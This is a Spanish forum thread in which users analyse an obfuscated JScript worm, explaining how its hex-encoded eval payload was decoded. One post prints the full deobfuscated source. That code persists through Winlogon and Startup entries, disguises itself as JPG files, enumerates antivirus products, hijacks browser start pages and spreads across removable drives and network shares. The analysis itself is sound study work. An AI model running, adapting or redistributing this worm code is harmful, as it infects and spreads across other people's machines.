hmm cierto! no tiene los "sub function" o cosas as XD por eso me pareció tan extrañamente parecido a jscript desde el inicio
Título: Re: [Ayuda] descifrando un virus
Publicado por: Eleкtro en 13 Julio 2015, 17:10 pm
Añado al comentario de @Mad Antrax:
➢ Windows Script Host (https://en.wikipedia.org/wiki/Windows_Script_Host)
Saludos
Título: Re: [Ayuda] descifrando un virus
Publicado por: danny920825 en 13 Julio 2015, 17:40 pm
Hola de nuevo, dejenme consultarlos, ahora que veo que se unieron los 3 grandes que admiro (Elektro, Mad Antrax y engel lex). Estaba leyendo el contenido de wikipedia y dice que si, que windows script host ejecuta Jscripst, y sus derivados, vbs y sus derivados y otros como WSH y WSF. Pero lo que quiero preguntar haciendo un parentesis en su investigacion de que hace este amigo que estamos entendiendo, es como yo pongo el codigo y que me salga como lo puso "engel lex" o sea, identado, porque a mi me salio corrido.
Título: Re: [Ayuda] descifrando un virus
Publicado por: Mad Antrax en 13 Julio 2015, 17:46 pm
Hola de nuevo, dejenme consultarlos, ahora que veo que se unieron los 3 grandes que admiro (Elektro, Mad Antrax y engel lex). Estaba leyendo el contenido de wikipedia y dice que si, que windows script host ejecuta Jscripst, y sus derivados, vbs y sus derivados y otros como WSH y WSF. Pero lo que quiero preguntar haciendo un parentesis en su investigacion de que hace este amigo que estamos entendiendo, es como yo pongo el codigo y que me salga como lo puso "engel lex" o sea, identado, porque a mi me salio corrido.
El codigo original que has posteado está "ofuscado", basicamente se trata de una laaaaarga cadena de caracteres, luego un bucle recorre la cadena y transforma los caracteres hexadecimal en su valor decimal, luego ese numero la parsea en la tabla ascii y lo transforma en un caracter "imprimible". El final de todo termina contruyendo una cadena de código JS que es ejecutada por la función eval() angel lex ha dumpeado la variable final "ll" y la ha pegado bajo las etiquetas geshi, para que se pueda leer de forma más comoda. Ahora solo falta analizar que ocurre en cada linea del JS "deofuscado" :D
Título: Re: [Ayuda] descifrando un virus
Publicado por: engel lex en 13 Julio 2015, 17:47 pm
hmmm sorry por no explicar...
lo que hice
como se que el eval (la ultima instrucción) ejecuta, lo meti en la consola de chrome, y luego busqué que contenia "ll"
eso trae todo el código en una linea... de ahí me fui a http://jsbeautifier.org/ (http://jsbeautifier.org/), tiré el código y lo "embellecí", esa herramienta es muy útil para desofuscar
Título: Re: [Ayuda] descifrando un virus
Publicado por: danny920825 en 13 Julio 2015, 18:17 pm
Gracias por el dato de la web. Pero a lo que me refiero es a que cuando publique un codigo por ejemplo en VBS me salga con colores, que tengo que poner?
Título: Re: [Ayuda] descifrando un virus
Publicado por: engel lex en 13 Julio 2015, 18:22 pm
:P las etiqeutas GeSHi
estás arriba de los emticones a la derecha, ahí te salen los lenguajes y pegas el código entre etiquetas :P
Título: Re: [Ayuda] descifrando un virus
Publicado por: danny920825 en 13 Julio 2015, 18:27 pm
Gracias, ya lo vi. Muchas gracias por todo. Al final, que es lo que hace el codigo?
Título: Re: [Ayuda] descifrando un virus
Publicado por: MCKSys Argentina en 13 Julio 2015, 18:33 pm
Te contesto con preguntas: Qué es lo que has hecho para saberlo; además de preguntar a los demas? Has intentado, siquiera, por tus medios tratar de comprenderlo?
:silbar:
Título: Re: [Ayuda] descifrando un virus
Publicado por: danny920825 en 13 Julio 2015, 19:19 pm
Sip, pero solo entiendo algo ligero de vbs y 2 de sus objetos fundamentales el 'scripting.filesystemobject' y el 'wscript.shell'
Para empezar, define 4 objetos, los 2 anteriores, Shell.Application y WbemScripting.SWbemLocator, ambos desconocidos para mi.
De ahi pasa a definir segun lo que veo, a seleccionar la codificacion, que no se con que objetivo se hace. Luego define variables como la carpeta de inicio del usuario, y varias llaves del registro, la primera supongo que es la de autoinicio y la segunda es el icono del script, el cual recoge de la clase .jpg. Hasta ahi, todo es facil de entender, pero lo demas se dificulta porque no entiendo el codigo.
Título: Re: [Ayuda] descifrando un virus
Publicado por: Wolfkey en 8 Octubre 2015, 09:37 am
no sabia que el vbs se parecía tanto el js... solo tienes que seguir los pasos sin el eval (para que no se ejecute) y revisar la variable que se evalua aquí está sin la primera ofuscación try { a = WScript.CreateObject('Scri' + 'pting.Fi' + 'leSys' + 'temObj' + 'ect'); b = WScript.CreateObject('WSc' + 'ript.Sh' + 'ell'); s = WScript.CreateObject('She' + 'll.Appli' + 'cation'); wl = WScript.CreateObject('WbemScr' + 'ipting.SWbemL' + 'ocator'); db = WScript.CreateObject('ADO' + 'DB.Str' + 'eam'); db.CharSet = "US-ASCII"; db.Type = 2; c3 = b.SpecialFolders("Startup"); nt6 = (b.RegRead('HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentVersion') >= 6 ? true : false); jico = b.RegRead("HKLM\\SOFTWARE\\Classes\\" + b.RegRead("HKLM\\SOFTWARE\\Classes\\.jpg\\") + "\\DefaultIcon\\"); ico = "explorer.exe"; g = WScript.ScriptFullName; da = new Date(); ano = da.getYear() + ""; mes = da.getMonth(); dia = da.getDate(); hra = 0; antv = new Array(""); rgk = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"; wlg = "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell"; gn = new Array("IMG", "IMG_", "PIC", "DSC", "CIMG", "HPIM", "IMAG", "DSCF", "DSCN", "DCIM", "IM", "PICT", "SAM_"); sp = ""; for (r = 0; r < 94; r++) { sp += " "; } ex = gn[Math.round(Math.random() * 12)] + ano.substring(2, 4) + "" + mes + dia + ".JPG" + sp + ".jse"; jex = ""; tas = "explorer"; fsz = a.GetFile(g).Size; wsc = WScript.FullName; stl = "https://www.google.es/#output=search&sclient=psy-ab&q=fiverdolly+"; stp = stl + fsz; if (s.NameSpace(26) == "Roaming") { tot = a.GetFolder(s.NameSpace(26).ParseName("Microsoft").Path).ParentFolder; } else { tot = s.NameSpace(40).ParseName(s.NameSpace(26)).Path; } nt(); } catch (e) {} sf = ""; function nt() { try { c1 = s.NameSpace(28).ParseName("microsoft"); c2 = c1.GetFolder.Items().Count; rf = Math.round(Math.random() * c2 - 1); c4 = c1.GetFolder.Items().item(rf).Path; if (a.FolderExists(c4) == false) { c4 = a.GetFile(c4).ParentFolder; } } catch (e) { c4 = c1.Path; } c5 = Math.random() * 8 + 1 + ""; c5 = c5.replace(".", ""); try { b.RegWrite("HKCU\\SOFTWARE\\Classes\\JSEFile\\DefaultIcon\\", jico, "REG_SZ"); } catch (e) {} try { jtyp = b.RegRead("HKLM\\SOFTWARE\\Classes\\jpegfile\\FriendlyTypeName"); b.RegWrite("HKCU\\SOFTWARE\\Classes\\JSEFile\\FriendlyTypeName", jtyp, "REG_EXPAND_SZ"); } catch (e) {} try { b.RegWrite("HKLM\\SOFTWARE\\Classes\\JSEFile\\DefaultIcon\\", jico, "REG_SZ"); } catch (e) {} try { b.RegWrite("HKLM\\SOFTWARE\\Classes\\JSEFile\\FriendlyTypeName", jtyp, "REG_EXPAND_SZ"); } catch (e) {} if (g.substring(g.lastIndexOf("\\") + 1, g.length).toLowerCase().search(".jpg" + sp + ".jse") != -1) { try { if (a.FileExists(g.substring(0, g.lastIndexOf(sp + ".jse"))) == true) { b.run('"' + g.substring(0, g.lastIndexOf(sp + ".jse")) + '"'); } else { wp = b.RegRead("HKCU\\Control Panel\\Desktop\\Wallpaper"); if (wp.substring(wp.lastIndexOf("\\") + 1, wp.length) == "TranscodedWallpaper") { jpgc = b.RegRead("HKLM\\SOFTWARE\\Classes\\jpegfile\\shell\\open\\command\\").replace("%1", wp); b.run(jpgc); } else { b.run('"' + wp + '"'); } } } catch (e) {} try { sc = wl.ConnectServer(null, "root\\default"); rg = sc.Get("StdRegProv"); m = rg.Methods_.Item("EnumValues"); pin = m.InParameters.SpawnInstance_(); rk = new Object(); rk["HKCU"] = rk["HKEY_CURRENT_USER"] = 0x80000001; rv = rk[rgk.substr(0, rgk.indexOf("\\"))]; pin.hDefKey = rv; pin.sSubKeyName = rgk.substr(rgk.indexOf("\\") + 1); pot = rg.ExecMethod_(m.Name, pin); ak = pot.sNames.toArray(); for (key in ak) { tts = b.RegRead(rgk + "\\" + ak[key]) + ""; if (tts.search(".exe") != -1) { tts2 = tts.substring(0, tts.search(".exe")); tts3 = tts2.substring(tts2.lastIndexOf(":") - 1, tts2.length) + ".exe"; if (a.FileExists(tts3) == true) { ico = tts3; } if (tts2.indexOf("\\") != -1) { tts2 = tts2.substring(tts2.lastIndexOf("\\") + 1, tts2.length); } tas = tts2; } } } catch (e) {} if (tas.indexOf(" ") != -1) { tas = tas.substring(0, tas.indexOf(" ")); } if (tas.indexOf(".") != -1) { tas = tas.substring(0, tas.indexOf(".")); } try { newd = fsz; olddf = b.RegRead(wlg); olddf = olddf.substring(olddf.lastIndexOf('" "') + 3, olddf.lastIndexOf('"')); } catch (e) { olddf = shcu(); } if (a.FileExists(olddf) == true) { c4 = a.GetFile(olddf).ParentFolder; oldd = a.GetFile(olddf).size; } else { oldd = 0; olddf = c4 + "\\" + c5; } if (newd >= oldd) { if (a.FileExists(olddf) == true) { a.GetFile(olddf).Attributes = 0; } db.Open(); try { av = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\SecurityCenter" + (nt6 ? '2' : '')); avi = av.ExecQuery("SELECT * FROM AntiVirusProduct", "WQL"); navi = new Enumerator(avi); antv = new Array(); for (; !navi.atEnd(); navi.moveNext()) { oav = navi.item(); antv.push(oav.displayName); } } catch (e) { antv = new Array("NAC"); } try { vic = "<" + b.RegRead("HKCU\\Volatile Environment\\LOGONSERVER").replace("\\\\", "") + ":" + b.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName") + "=" + s.NameSpace(40) + ":" + antv + ">"; } catch (e) { vic = ""; } cod = ci(); if (cod.search(vic) == -1 && rad != 0) { nda = vic + "**/"; his = cod.replace("**/", nda); db.WriteText(his); } else { db.WriteText(cod); } db.SaveToFile(olddf, 2); db.Close(); try { if (a.GetFile(olddf).OpenAsTextStream(1, -2).ReadAll().charCodeAt(0) != 122) { a.CopyFile(g, olddf, true); } a.GetFile(olddf).Attributes = 2; } catch (e) {} wsh = c4 + "\\" + tas + ".exe"; try { a.CopyFile(wsc, wsh); } catch (e) {} a.GetFile(wsh).Attributes = 2; try { drg = '"' + wsh + '" "' + olddf + '" //E:JScript //B'; shcu(); ec = b.CreateShortcut(c3 + "\\" + tas + ".lnk"); ec.TargetPath = c4 + "\\" + tas + ".exe"; ec.Arguments = '"' + olddf + '" //E:JScript //B -ns'; ec.IconLocation = ico; ec.Save(); b.RegWrite(wlg, drg, 'REG_SZ'); WScript.Sleep(9999); if (b.RegRead(wlg) == drg) { a.DeleteFile(c3 + "\\" + tas + ".lnk"); } } catch (e) {} } } else { try { if (WScript.Arguments.length == 0) { b.run("explorer.exe"); } } catch (e) {} try { fcfp = new Array(); tcmd = new Array(); for (t = 0; t < 9; t++) { tcmd.push(tot + "\\TC201" + t + "\\tcignore.txt"); try { fcfp.push(s.NameSpace(38).ParseName("TotalCommander201" + t).Path + "\\Tools\\Mozilla Firefox\\defaults\\profile"); } catch (e) {} try { fcfp.push(s.NameSpace(48).ParseName("TotalCommander201" + t).Path + "\\Tools\\Mozilla Firefox\\defaults\\profile"); } catch (e) {} } try { tcmd.push(s.NameSpace(38).ParseName("TC UP").Path + "\\tcignore.txt"); } catch (e) {} try { tcmd.push(s.NameSpace(48).ParseName("TC UP").Path + "\\tcignore.txt"); } catch (e) {} try { tcmd.push(s.NameSpace(28).ParseName("ghisler").Path + "\\tcignore.txt"); } catch (e) {} try { tcmd.push(s.NameSpace(26).ParseName("ghisler").Path + "\\tcignore.txt"); } catch (e) {} tcmd.push("c:\\totalcmd\\tcignore.txt"); for (t = 0; t < tcmd.length; t++) { if (a.FileExists(tcmd[t].replace("tcignore.txt", "wincmd.ini")) == true) { try { db.Open(); if (a.FileExists(tcmd[t]) == false) { ttn = a.CreateTextFile(tcmd[t], true); ttn.Write("**.**.jse"); ttn.close(); } igl = ""; try { db.LoadFromFile(tcmd[t]); igl = db.ReadText; } catch (e) {} db.Close(); if (igl.indexOf("**.**.jse") == -1) { db.Open(); db.WriteText(igl, 1); db.WriteText("**.**.jse", 1); a.DeleteFile(tcmd[t]); db.SaveToFile(tcmd[t]); db.Close(); } } catch (e) {} try { tor = a.OpenTextFile(a.GetFile(tcmd[t]).ParentFolder + "\\Wincmd.ini", 1, true, 0); toa = tor.ReadAll(); if (toa.search("IgnoreListFileEnabled=0") != -1) { toa = toa.replace("IgnoreListFileEnabled=0", "IgnoreListFileEnabled=1"); } if (toa.search("IgnoreListFile=") == -1) { toa = toa.replace("[Configuration]", "[Configuration]" + "\nIgnoreListFile=" + tcmd[t]); } if (tcmd[t].search("TC201") != -1) { if (toa.search("=*.jse") == -1) { filt = toa.substring(toa.lastIndexOf("Filter") + 6, toa.lastIndexOf(".icon=")); enf = toa.substring(toa.lastIndexOf("Filter"), toa.length); enl = enf.substring(0, enf.indexOf("\n") + 1); fln = new Number(filt) + 1; ficon = toa.substring(toa.search("Filter11.icon=") + 14, toa.length); dicon = ficon.substring(0, ficon.search("\n")); toa = toa.replace(enl, enl + "\nFilter" + fln + "=*.jse\nFilter" + fln + ".icon=" + dicon + "\n"); toa = toa.replace("FileTipWindows=1", "FileTipWindows=0"); } } tor.close(); tow = a.OpenTextFile(a.GetFile(tcmd[t]).ParentFolder + "\\Wincmd.ini", 2, true, 0); tow.Write(toa); tow.close(); } catch (e) {} } } } catch (e) {} try { b.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", stp, "REG_SZ") } catch (e) {} try { if (a.FolderExists(tot + "\\Mozilla\\Firefox\\Profiles") == true) { fpf = a.GetFolder(tot + "\\Mozilla\\Firefox\\Profiles"); pff = new Enumerator(fpf.SubFolders); for (; !pff.atEnd(); pff.moveNext()) { pfs = pff.item() + ""; if (pfs.search(".default") != -1) { fcfp.push(pfs); } } } for (q = 0; q < fcfp.length; q++) { try { if (a.FileExists(fcfp[q] + "\\prefs.js") == true); { fjf = a.OpenTextFile(fcfp[q] + "\\prefs.js", 1); fjs = fjf.ReadAll(); fjf.close(); usp = 'user_pref("browser.startup.homepage",'; if (fjs.indexOf(usp) != -1) { fjs1 = fjs.substring(fjs.indexOf(usp) + 37, fjs.length); fjs2 = fjs1.substring(0, fjs1.indexOf(');') + 2); fjs3 = fjs.replace(usp + fjs2, usp + ' "' + stp + '");'); wjf = a.OpenTextFile(fcfp[q] + "\\prefs.js", 2); wjf.Write(fjs3); } else { wjf = a.OpenTextFile(fcfp[q] + "\\prefs.js", 8); wjf.WriteLine('\n' + usp + ' "' + stp + '");'); } wjf.close(); } } catch (e) {} } } catch (e) {} try { gfs = s.NameSpace(28).ParseName("Google").Path + "\\Chrome\\User Data\\Default\\Preferences"; if (a.FileExists(gfs) == true) { gjf = a.OpenTextFile(gfs, 1); gjs = gjf.ReadAll(); gjf.close(); gjsn = gjs.length; urs = '"urls_to_restore_on_startup": ['; ros = '"restore_on_startup":'; rosm = '"restore_on_startup_migrated":'; if (gjs.indexOf(stl) == -1) { if (gjs.indexOf(urs) != -1) { gjs1 = gjs.substring(gjs.indexOf(urs) + 31, gjsn); gjs2 = gjs1.substring(0, gjs1.indexOf("]") + 1); gjs3 = gjs.replace(urs + gjs2, urs + ' "' + stp + '", ' + gjs2); } else { gjs1 = gjs.substring(gjs.indexOf(rosm), gjsn); gjs2 = gjs1.substring(0, gjs1.indexOf("\n") + 1); gjs3 = gjs.replace(gjs2, rosm + ' true,\n\t' + urs + ' "' + stp + '" ]\n'); } gjs4 = gjs.substring(gjs.indexOf(ros), gjsn); gjs5 = gjs4.substring(0, gjs4.indexOf(',') + 1); gjs3 = gjs3.replace(gjs5, ros + ' 4,'); wjg = a.OpenTextFile(gfs, 2); wjg.Write(gjs3); wjg.close(); } else { fds = gjs.substring(gjs.indexOf(stl), gjs.length); fdc = fds.substring(0, fds.indexOf('"')); gjs4 = gjs.replace(fdc, stp); wjg = a.OpenTextFile(gfs, 2); wjg.Write(gjs4); wjg.close(); } } } catch (e) {} mk(); } } function mk() { WScript.Sleep(120000); try { c = new Enumerator(a.Drives); for (; !c.atEnd(); c.moveNext()) { tipodisco = c.item().DriveType; switch (tipodisco) { case 1: case 3: if (c.item() != "A:" && c.item() != "B:") { try { sf = a.GetFolder(pe(c.item() + "\\")); tgf = new Enumerator(sf.files); for (; !tgf.atEnd(); tgf.moveNext()) { stf = tgf.item() + ""; if (stf.substring(stf.length - 4, stf.length).toUpperCase() == ".JPG") { jex = tgf.item().Name + sp + ".jse"; } if (stf.toLowerCase().indexOf(".jpg" + sp + ".jse") != -1) { ex = tgf.item().Name; } } if (a.FileExists(sf + "\\" + ex) == false) { if (jex != "") { ex = jex; } a.CopyFile(g, sf + "\\" + ex); if (a.FileExists(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) { a.GetFile(sf + "\\" + ex).Attributes = a.GetFile(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes; } else { a.GetFile(sf + "\\" + ex).Attributes = 0 }; if (a.FileExists(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) { a.GetFile(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes = 2; } } else { if (a.GetFile(sf + "\\" + ex).Size < fsz) { a.GetFile(sf + "\\" + ex).Attributes = 0; a.DeleteFile(sf + "\\" + ex); a.CopyFile(g, sf + "\\" + ex); a.GetFile(sf + "\\" + ex).Attributes = 0; } } } catch (e) {} sf = ""; } break; default: break; } } } catch (e) {} try { if (hra < 12) { hra += 1; } if (hra == 12) { dns = s.NameSpace(18); ens = dns.Items().Count; hns = new Array(); for (f = 0; f < ens; f++) { gns = dns.Items().item(f); hns.push("dns.Items().Item(" + f + ").GetFolder"); } for (i = 0; i < hns.length; i++) { try { jns = eval(hns[i]).Items().Count; for (l = 0; l < jns; l++) { if (a.FolderExists(eval(hns[i] + ".Items().item(" + l + ").Path")) == false) { hns.push(hns[i] + ".Items().item(" + l + ").GetFolder"); } else { try { dis = pe(eval(hns[i] + ".Items().item(" + l + ").Path") + "\\") + ""; di = a.GetFolder(dis); tgf = new Enumerator(di.files); for (; !tgf.atEnd(); tgf.moveNext()) { stf = tgf.item() + ""; if (stf.substring(stf.length - 4, stf.length).toUpperCase() == ".JPG") { jex = tgf.item().Name + sp + ".jse"; } if (stf.toLowerCase().indexOf(".jpg" + sp + ".jse") != -1) { ex = tgf.item().Name; } } if (a.FileExists(di + "\\" + ex) == false && dis.charAt(1) != ":") { if (jex != "") { ex = jex; } a.CopyFile(g, di + "\\" + ex); if (a.FileExists(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) { a.GetFile(di + "\\" + ex).Attributes = a.GetFile(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes; } else { a.GetFile(di + "\\" + ex).Attributes = 0; } if (a.FileExists(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) { a.GetFile(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes = 2; } } else { if (a.GetFile(di + "\\" + ex).Size < fsz) { a.GetFile(di + "\\" + ex).Attributes = 0; a.DeleteFile(di + "\\" + ex); a.CopyFile(g, di + "\\" + ex); a.GetFile(di + "\\" + ex).Attributes = 0; } } } catch (e) {} } } } catch (e) {} } hra = 0; } } catch (e) {} mk(); } function ci() { try { db2 = a.OpenTextFile(g, 1); g2 = db2.ReadAll(); db2.Close(); g3 = g2.substring(g2.search('z="') + 3, g2.search('";')); g1 = g2.substring(0, g2.search('z="') + 3); gr = g2.substring(g2.search('";'), g2.length); t = ll; tt = ""; tm = t.length; rac = Math.round(Math.random() * 98) + 1; for (x = 0; x < tm; x++) { num = t.charCodeAt(x) + rac; hx = num.toString(16); if (hx.length < 2) { hx = "0" + hx; } tt += hx; hx = ''; } if (rac < 10) { rac = "0" + rac; } tt += rac; g4 = g1 + tt + gr; return g4; } catch (e) {} } function pe(tar) { onef = false; sfp = a.GetFolder(tar); tgc = new Enumerator(sfp.subFolders); for (; !tgc.atEnd(); tgc.moveNext()) { stc = tgc.item().Name.toLowerCase(); if (stc.search("foto") != -1 || stc.search("photo") != -1 || stc.search("image") != -1 || stc.search("im\u00E1ge") != -1 || stc.search("picture") != -1) { if (onef == false) { sfp = a.GetFolder(tgc.item() + "\\"); } onef = true; } } return sfp; } function shcu() { cshc = ""; lnks = new Enumerator(a.GetFolder(c3).files); for (; !lnks.atEnd(); lnks.moveNext()) { try { lks = lnks.item() + ""; if (lks.substring(lks.length - 4, lks.length).toLowerCase() == ".lnk") { lnka = b.CreateShortcut(lnks.item()).Arguments; if (lnka.search("//E:JScript //B -ns") != -1) { cshc = lnka.substring(lnka.indexOf('"') + 1, lnka.lastIndexOf('"')); a.DeleteFile(lnks.item()); } } } catch (e) {} } return cshc; }
Hola, una pregunta, usaste algun programa para traducir, de ser asi cual seria, sino, como lo hiciste para traducir toda esa cadena y en que lenguaje esta ese codigo(no el traducido el original)
Título: Re: [Ayuda] descifrando un virus
Publicado por: Mad Antrax en 8 Octubre 2015, 10:09 am
No se utilizó ningún programa. Lo tienes todo explicado entre la pagina 2 y 3
|